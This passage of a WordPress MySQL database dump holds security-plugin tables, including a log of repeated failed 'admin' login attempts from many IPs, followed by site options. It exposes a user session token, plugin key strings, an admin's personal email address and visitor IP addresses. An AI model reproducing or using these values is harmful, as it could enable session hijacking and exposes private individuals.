09:35:43','189.203.97.38','login_fail',''),(287,1,'admin','2021-09-10 04:18:43','2021-09-10 05:18:43','41.141.133.158','login_fail',''),(288,0,'equalitywalk','2021-09-10 09:55:04','2021-09-10 10:55:04','178.221.182.45','login_fail',''),(289,0,'equalitywalk','2021-09-10 10:57:05','2021-09-10 11:57:05','178.221.182.45','login_fail',''),(290,1,'admin','2021-09-10 11:59:08','2021-09-10 12:59:08','178.221.182.45','login_fail',''),(291,1,'admin','2021-09-10 12:04:57','2021-09-10 13:04:57','41.141.133.158','login_fail',''),(292,1,'admin','2021-09-10 12:31:10','2021-09-10 13:31:10','105.156.9.143','login_fail',''),(293,1,'admin','2021-09-10 13:01:59','2021-09-10 14:01:59','178.221.182.45','login_fail',''),(294,1,'admin','2021-09-10 14:41:06','2021-09-10 15:41:06','54.197.34.112','login_fail',''),(295,1,'admin','2021-09-10 15:06:46','2021-09-10 16:06:46','40.66.43.213','login_fail',''),(296,1,'admin','2021-09-10 15:41:23','2021-09-10 16:41:23','54.197.34.112','login_fail',''),(297,1,'admin','2021-09-10 16:41:33','2021-09-10 17:41:33','54.197.34.112','login_fail',''),(298,1,'admin','2021-09-11 00:38:03','2021-09-11 01:38:03','40.66.43.213','login_fail',''),(299,0,'mountaineers2017','2021-09-11 14:19:14','2021-09-11 15:19:14','47.254.170.184','login_fail',''),(300,1,'admin','2021-09-11 14:24:11','2021-09-11 15:24:11','20.92.224.165','login_fail',''),(301,1,'admin','2021-09-11 15:24:13','2021-09-11 16:24:13','20.92.224.165','login_fail',''),(302,1,'admin','2021-09-11 20:33:31','2021-09-11 21:33:31','103.76.19.41','login_fail',''),(303,1,'admin','2021-09-12 07:20:40','2021-09-12 08:20:40','94.177.232.148','login_fail',''),(304,1,'admin','2021-09-12 08:50:52','2021-09-12 09:50:52','20.92.224.165','login_fail',''),(305,0,'neemias','2021-09-12 11:33:34','2021-09-12 12:33:34','20.92.224.165','login_fail',''),(306,0,'neemias','2021-09-12 12:33:37','2021-09-12 13:33:37','20.92.224.165','login_fail',''),(307,0,'zabitruclinh','2021-09-12 13:33:38','2021-09-12 14:33:38','20.92.224.165','login_fail',''),(308,0,'newindia','2021-09-12 14:33:39','2021-09-12 15:33:39','20.92.224.165','login_fail',''),(309,1,'admin','2021-09-12 17:36:34','2021-09-12 18:36:34','69.55.55.116','login_fail',''),(310,1,'admin','2021-09-12 17:41:17','2021-09-12 18:41:17','192.236.177.124','login_fail',''),(311,0,'equalitywalk','2021-09-12 19:52:18','2021-09-12 20:52:18','135.125.100.49','login_fail',''),(312,1,'admin','2021-09-13 11:25:07','2021-09-13 12:25:07','103.231.89.236','login_fail',''),(313,1,'admin','2021-09-13 11:32:50','2021-09-13 12:32:50','185.147.34.111','login_fail',''),(314,1,'admin','2021-09-13 11:33:07','2021-09-13 12:33:07','159.242.234.189','login_fail',''),(315,1,'admin','2021-09-13 11:47:37','2021-09-13 12:47:37','5.62.20.48','login_fail',''),(316,1,'admin','2021-09-13 17:08:34','2021-09-13 18:08:34','185.147.34.111','login_fail',''),(317,1,'admin','2021-09-13 17:09:00','2021-09-13 18:09:00','5.62.20.29','login_fail',''),(318,1,'admin','2021-09-13 17:09:43','2021-09-13 18:09:43','84.17.46.205','login_fail',''),(319,1,'admin','2021-09-13 17:21:46','2021-09-13 18:21:46','45.87.184.50','login_fail',''),(320,1,'admin','2021-09-13 17:23:04','2021-09-13 18:23:04','212.102.33.173','login_fail',''),(321,1,'admin','2021-09-13 17:26:37','2021-09-13 18:26:37','5.62.20.46','login_fail',''),(322,1,'admin','2021-09-13 17:29:07','2021-09-13 18:29:07','159.242.228.42','login_fail',''),(323,1,'admin','2021-09-13 17:33:15','2021-09-13 18:33:15','185.77.217.37','login_fail',''),(324,1,'admin','2021-09-13 17:36:42','2021-09-13 18:36:42','5.62.20.27','login_fail',''),(325,0,'equalitywalk','2021-09-15 20:53:48','2021-09-15 21:53:48','82.159.185.75','login_fail',''),(326,0,'equalitywalk','2021-09-15 21:55:49','2021-09-15 22:55:49','82.159.185.75','login_fail',''),(327,1,'admin','2021-09-15 22:58:51','2021-09-15 23:58:51','82.159.185.75','login_fail',''),(328,1,'admin','2021-09-16 00:01:53','2021-09-16 01:01:53','82.159.185.75','login_fail',''),(329,1,'admin','2021-09-16 11:43:17','2021-09-16 12:43:17','34.134.92.241','login_fail','');
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:3:{i:0;s:68:\"A new version of WP Cerber Security is available. Please install it.\";i:1;s:68:\"A new version of WP Cerber Security is available. Please install it.\";i:2;s:68:\"A new version of WP Cerber Security is available. Please install it.\";}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:40:\"0c3c442ba67c66fa3227e09aeb8c763c79676604\";}s:11:\"2fa_history\";a:2:{i:0;i:1;i:1;i:1649674019;}}',0),('garbage_collector',0,'1675209342',0),('refresh_add_on_list',0,'0',0),('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"370f7b7292e741f9cf743d9029c79135\";i:1;i:1631796687;i:4;s:40:\"SK//2GMQA9V6FCE3RO4T8HWYLD1IUSZNB5PK0JX7\";}',0),('_cerber_mnemosyne',0,'a:3:{i:1;s:17:\"UHN3XLCAWS08OKTR2\";i:4;i:7;i:7;s:19:\"SPJXA986UVIR0ZQL32M\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp_cerber_uss` VALUES (1,'185.175.113.72','',1649674019,1649846819,'voUAKTEar2km4d73wZ6sR9XL','b235c7e80a18dea2271efbb8e8a7a853a1c26cd4f058e71f8d16b55c6db63b56');
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=167368 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.equalitywalk.org.uk','yes'),(2,'home','http://www.equalitywalk.org.uk','yes'),(3,'blogname','Equality SMART','yes'),(4,'blogdescription','where the smart money listens','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','amber.platts@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:18:{i:0;s:35:\"redux-framework/redux-framework.php\";i:1;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:2;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:3;s:36:\"google-sitemap-generator/sitemap.php\";i:4;s:37:\"head-footer-code/head-footer-code.php\";i:5;s:32:\"login-lockdown/loginlockdown.php\";i:6;s:41:\"mb-sitemap-generator/sitemapgenerator.php\";i:7;s:41:\"post-type-switcher/post-type-switcher.php\";i:8;s:47:\"quick-featured-images/quick-featured-images.php\";i:9;s:63:\"smntcs-google-webmaster-tools/smntcs-google-webmaster-tools.php\";i:10;s:29:\"spam-captcha/spam-captcha.php\";i:11;s:48:\"traffic-stats-widget/wp-traffic-stats-widget.php\";i:12;s:57:\"universal-google-analytics/universal-google-analytics.php\";i:13;s:17:\"unyson/unyson.php\";i:14;s:24:\"wordpress-seo/wp-seo.php\";i:15;s:35:\"wp-date-remover/wp-date-remover.php\";i:16;s:38:\"wp-find-and-replace/search-replace.php\";i:17;s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://r